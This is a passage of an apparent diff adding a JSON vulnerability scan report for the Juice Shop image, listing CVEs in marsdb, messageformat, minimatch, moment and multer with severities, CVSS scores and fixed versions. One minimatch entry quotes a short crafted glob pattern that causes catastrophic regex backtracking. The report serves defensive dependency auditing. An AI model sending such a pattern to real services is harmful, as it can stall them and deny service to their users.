"sha256:7d3579ade71a9e12339a17931b737a3e68981b83a42a8fd025b498c9631faf9e", + "Title": "Command Injection in marsdb", + "Description": "All versions of `marsdb` are vulnerable to Command Injection. In the `DocumentMatcher` class, selectors on `$where` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed.\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.", + "Severity": "CRITICAL", + "VendorSeverity": { + "ghsa": 4 + }, + "References": [ + "https://github.com/bkimminich/juice-shop/issues/1173", + "https://www.npmjs.com/advisories/1122" + ], + "PublishedDate": "2020-09-03T19:39:05Z", + "LastModifiedDate": "2020-08-31T18:48:01Z" + }, + { + "VulnerabilityID": "CVE-2025-57349", + "VendorIDs": [ + "GHSA-xfqm-j7pc-xrfc" + ], + "PkgID": "messageformat@2.3.0", + "PkgName": "messageformat", + "PkgPath": "juice-shop/node_modules/messageformat/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/messageformat@2.3.0", + "UID": "af2d824ad50e701a" + }, + "InstalledVersion": "2.3.0", + "FixedVersion": "3.0.0-beta.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-57349", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:be325bc2cb3aac71eb4006a4e58b9af7fc5d86b42f385bcdc2dca30d21c810f9", + "Title": "messageformat has a prototype pollution vulnerability", + "Description": "The messageformat package, an implementation of the Unicode MessageFormat 2 specification for JavaScript, is vulnerable to prototype pollution due to improper handling of message key paths in versions prior to 2.3.0. The flaw arises when processing nested message keys containing special characters (e.g., __proto__ ), which can lead to unintended modification of the JavaScript Object prototype. This vulnerability may allow a remote attacker to inject properties into the global object prototype via specially crafted message input, potentially causing denial of service or other undefined behaviors in applications using the affected component.", + "Severity": "LOW", + "CweIDs": [ + "CWE-1321" + ], + "VendorSeverity": { + "ghsa": 1 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:U", + "V40Score": 1.7 + } + }, + "References": [ + "https://github.com/messageformat/messageformat", + "https://github.com/messageformat/messageformat/issues/452", + "https://nvd.nist.gov/vuln/detail/CVE-2025-57349" + ], + "PublishedDate": "2025-09-24T19:15:40.233Z", + "LastModifiedDate": "2025-10-17T14:49:25.293Z" + }, + { + "VulnerabilityID": "CVE-2026-26996", + "VendorIDs": [ + "GHSA-3ppc-4f35-3m26" + ], + "PkgID": "minimatch@3.0.5", + "PkgName": "minimatch", + "PkgPath": "juice-shop/node_modules/replace/node_modules/minimatch/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@3.0.5", + "UID": "1c17cde52495ade5" + }, + "InstalledVersion": "3.0.5", + "FixedVersion": "10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26996", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:2ac41f56cfb2f9eb60aad2fce00e08c5bc22b1f23908a1e774fa922f6778fde7", + "Title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 3, + "nvd": 3, + "oracle-oval": 3, + "redhat": 2, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:8339", + "https://access.redhat.com/security/cve/CVE-2026-26996", + "https://bugzilla.redhat.com/2441268", + "https://bugzilla.redhat.com/2442922", + "https://bugzilla.redhat.com/2448754", + "https://bugzilla.redhat.com/2453151", + "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", + "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", + "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", + "https://errata.almalinux.org/8/ALSA-2026-8339.html", + "https://errata.rockylinux.org/RLSA-2026:7896", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26", + "https://linux.oracle.com/cve/CVE-2026-26996.html", + "https://linux.oracle.com/errata/ELSA-2026-8339.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-26996", + "https://www.cve.org/CVERecord?id=CVE-2026-26996" + ], + "PublishedDate": "2026-02-20T03:16:01.62Z", + "LastModifiedDate": "2026-03-06T21:32:10.65Z" + }, + { + "VulnerabilityID": "CVE-2026-27903", + "VendorIDs": [ + "GHSA-7r86-cg39-jmmj" + ], + "PkgID": "minimatch@3.0.5", + "PkgName": "minimatch", + "PkgPath": "juice-shop/node_modules/replace/node_modules/minimatch/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@3.0.5", + "UID": "1c17cde52495ade5" + }, + "InstalledVersion": "3.0.5", + "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27903", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:209cfac33ee6e69068fc92a5eafa779728e4ef08e9785876fab75ede2887f51d", + "Title": "minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-407" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-27903", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27903", + "https://www.cve.org/CVERecord?id=CVE-2026-27903" + ], + "PublishedDate": "2026-02-26T02:16:21.353Z", + "LastModifiedDate": "2026-02-27T17:21:22.37Z" + }, + { + "VulnerabilityID": "CVE-2026-27904", + "VendorIDs": [ + "GHSA-23c5-xmqv-rm74" + ], + "PkgID": "minimatch@3.0.5", + "PkgName": "minimatch", + "PkgPath": "juice-shop/node_modules/replace/node_modules/minimatch/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@3.0.5", + "UID": "1c17cde52495ade5" + }, + "InstalledVersion": "3.0.5", + "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27904", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:abddf32db1daf91a0472f68af47e03532aaafe6c1ad54a2be62f82e6472c0bfe", + "Title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 3, + "oracle-oval": 3, + "redhat": 2, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:8339", + "https://access.redhat.com/security/cve/CVE-2026-27904", + "https://bugzilla.redhat.com/2441268", + "https://bugzilla.redhat.com/2442922", + "https://bugzilla.redhat.com/2448754", + "https://bugzilla.redhat.com/2453151", + "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", + "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", + "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", + "https://errata.almalinux.org/8/ALSA-2026-8339.html", + "https://errata.rockylinux.org/RLSA-2026:7896", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74", + "https://linux.oracle.com/cve/CVE-2026-27904.html", + "https://linux.oracle.com/errata/ELSA-2026-8339.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27904", + "https://www.cve.org/CVERecord?id=CVE-2026-27904" + ], + "PublishedDate": "2026-02-26T02:16:21.76Z", + "LastModifiedDate": "2026-02-27T17:16:23.773Z" + }, + { + "VulnerabilityID": "CVE-2017-18214", + "VendorIDs": [ + "GHSA-446m-mv8f-q348" + ], + "PkgID": "moment@2.0.0", + "PkgName": "moment", + "PkgPath": "juice-shop/node_modules/express-jwt/node_modules/moment/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/moment@2.0.0", + "UID": "7017ad3e12e409e7" + }, + "InstalledVersion": "2.0.0", + "FixedVersion": "2.19.3", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2017-18214", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:f157e24a7616c175a0fff3a0c01ac5cf829ecbb00b044d5b1c456b88118f55ee", + "Title": "nodejs-moment: Regular expression denial of service", + "Description": "The moment module before 2.19.3 for Node.js is prone to a regular expression denial of service via a crafted date string, a different vulnerability than CVE-2016-4055.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-400" + ], + "VendorSeverity": { + "azure": 3, + "cbl-mariner": 3, + "ghsa": 3, + "nvd": 3, + "redhat": 2, + "ubuntu": 1 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V2Score": 5, + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2017-18214", + "https://github.com/advisories/GHSA-446m-mv8f-q348", + "https://github.com/moment/moment", + "https://github.com/moment/moment/commit/69ed9d44957fa6ab12b73d2ae29d286a857b80eb", + "https://github.com/moment/moment/issues/4163", + "https://github.com/moment/moment/pull/4326", + "https://nodesecurity.io/advisories/532", + "https://nvd.nist.gov/vuln/detail/CVE-2017-18214", + "https://ubuntu.com/security/notices/USN-4786-1", + "https://www.cve.org/CVERecord?id=CVE-2017-18214", + "https://www.npmjs.com/advisories/532", + "https://www.tenable.com/security/tns-2019-02" + ], + "PublishedDate": "2018-03-04T21:29:00.23Z", + "LastModifiedDate": "2024-11-21T03:19:35.133Z" + }, + { + "VulnerabilityID": "CVE-2022-24785", + "VendorIDs": [ + "GHSA-8hfj-j24r-96c4" + ], + "PkgID": "moment@2.0.0", + "PkgName": "moment", + "PkgPath": "juice-shop/node_modules/express-jwt/node_modules/moment/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/moment@2.0.0", + "UID": "7017ad3e12e409e7" + }, + "InstalledVersion": "2.0.0", + "FixedVersion": "2.29.2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-24785", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:0ef96166f40b9079948f2630c35ac02f8d3d2f43563df9ad6c65bb5acf345d29", + "Title": "Moment.js: Path traversal in moment.locale", + "Description": "Moment.js is a JavaScript date library for parsing, validating, manipulating, and formatting dates. A path traversal vulnerability impacts npm (server) users of Moment.js between versions 1.0.1 and 2.29.1, especially if a user-provided locale string is directly used to switch moment locale. This problem is patched in 2.29.2, and the patch can be applied to all affected versions. As a workaround, sanitize the user-provided locale name before passing it to Moment.js.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22", + "CWE-27" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 2, + "ubuntu": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 7.5 + }, + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N", + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V2Score": 5, + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2022-24785", + "https://github.com/moment/moment", + "https://github.com/moment/moment/commit/4211bfc8f15746be4019bba557e29a7ba83d54c5", + "https://github.com/moment/moment/security/advisories/GHSA-8hfj-j24r-96c4", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00035.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5", + "https://nvd.nist.gov/vuln/detail/CVE-2022-24785", + "https://security.netapp.com/advisory/ntap-20220513-0006", + "https://security.netapp.com/advisory/ntap-20220513-0006/", + "https://security.netapp.com/advisory/ntap-20241108-0002", + "https://security.netapp.com/advisory/ntap-20241108-0002/", + "https://ubuntu.com/security/notices/USN-5559-1", + "https://www.cve.org/CVERecord?id=CVE-2022-24785", + "https://www.tenable.com/security/tns-2022-09" + ], + "PublishedDate": "2022-04-04T17:15:07.583Z", + "LastModifiedDate": "2025-11-03T22:15:57.28Z" + }, + { + "VulnerabilityID": "CVE-2016-4055", + "PkgID": "moment@2.0.0", + "PkgName": "moment", + "PkgPath": "juice-shop/node_modules/express-jwt/node_modules/moment/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/moment@2.0.0", + "UID": "7017ad3e12e409e7" + }, + "InstalledVersion": "2.0.0", + "FixedVersion": "\u003e=2.11.2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "nodejs-security-wg", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2016-4055", + "DataSource": { + "ID": "nodejs-security-wg", + "Name": "Node.js Ecosystem Security Working Group", + "URL": "https://github.com/nodejs/security-wg" + }, + "Fingerprint": "sha256:af962561bf3d8a73d9940480eaac059adceea8bd4898c0e54623cfd1370567b0", + "Title": "moment.js: regular expression denial of service", + "Description": "The duration function in the moment package before 2.11.2 for Node.js allows remote attackers to cause a denial of service (CPU consumption) via a long string, aka a \"regular expression Denial of Service (ReDoS).\"", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-400" + ], + "VendorSeverity": { + "ghsa": 2, + "nodejs-security-wg": 2, + "nvd": 2, + "redhat": 2, + "ubuntu": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + }, + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C", + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V2Score": 7.8, + "V3Score": 6.5 + }, + "redhat": { + "V2Vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P", + "V2Score": 4.3 + } + }, + "References": [ + "http://www.openwall.com/lists/oss-security/2016/04/20/11", + "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", + "http://www.securityfocus.com/bid/95849", + "https://access.redhat.com/security/cve/CVE-2016-4055", + "https://github.com/advisories/GHSA-87vv-r9j6-g5qv", + "https://github.com/moment/moment", + "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731%40%3Cdev.flink.apache.org%3E", + "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731@%3Cdev.flink.apache.org%3E", + "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49%40%3Cuser.flink.apache.org%3E", + "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49@%3Cuser.flink.apache.org%3E", + "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2%40%3Cuser.flink.apache.org%3E", + "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2@%3Cuser.flink.apache.org%3E", + "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854%40%3Cuser.flink.apache.org%3E", + "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854@%3Cuser.flink.apache.org%3E", + "https://nodesecurity.io/advisories/55", + "https://nvd.nist.gov/vuln/detail/CVE-2016-4055", + "https://ubuntu.com/security/notices/USN-4786-1", + "https://www.cve.org/CVERecord?id=CVE-2016-4055", + "https://www.npmjs.com/advisories/55", + "https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS", + "https://www.tenable.com/security/tns-2019-02" + ], + "PublishedDate": "2017-01-23T21:59:01.33Z", + "LastModifiedDate": "2026-05-13T00:24:29.033Z" + }, + { + "VulnerabilityID": "CVE-2025-47935", + "VendorIDs": [ + "GHSA-44fp-w29j-9vj5" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgPath": "juice-shop/node_modules/multer/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "b0c681a9db76ceba" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.0.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-47935", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:5832a49c38c9fd18468920ff6383603ffbf3dbcf3e806a0d3a4918354df4e665", + "Title": "Multer vulnerable to Denial of Service via memory leaks from unclosed streams", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal `busboy` stream is not closed, violating Node.js stream safety guidance. This leads to unclosed streams accumulating over time, consuming memory and file descriptors. Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are potentially impacted. Users should upgrade to 2.0.0 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-401" + ], + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665", + "https://github.com/expressjs/multer/pull/1120", + "https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5", + "https://nvd.nist.gov/vuln/detail/CVE-2025-47935" + ], + "PublishedDate": "2025-05-19T20:15:25.863Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + { + "VulnerabilityID": "CVE-2025-47944", + "VendorIDs": [ + "GHSA-4pg4-qvpc-4q3h" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgPath": "juice-shop/node_modules/multer/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "b0c681a9db76ceba" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.0.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-47944", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:689dc24724fa61a0f52195479f57f02222e9ebf609aad5bf9c2961dcc04e567c", + "Title": "Multer vulnerable to Denial of Service from maliciously crafted requests", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.0 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-248" + ], + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665", + "https://github.com/expressjs/multer/issues/1176", + "https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h", + "https://nvd.nist.gov/vuln/detail/CVE-2025-47944" + ], + "PublishedDate": "2025-05-19T20:15:26.007Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + { + "VulnerabilityID": "CVE-2025-48997", + "VendorIDs": [ + "GHSA-g5hg-p3ph-g8qg" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgPath": 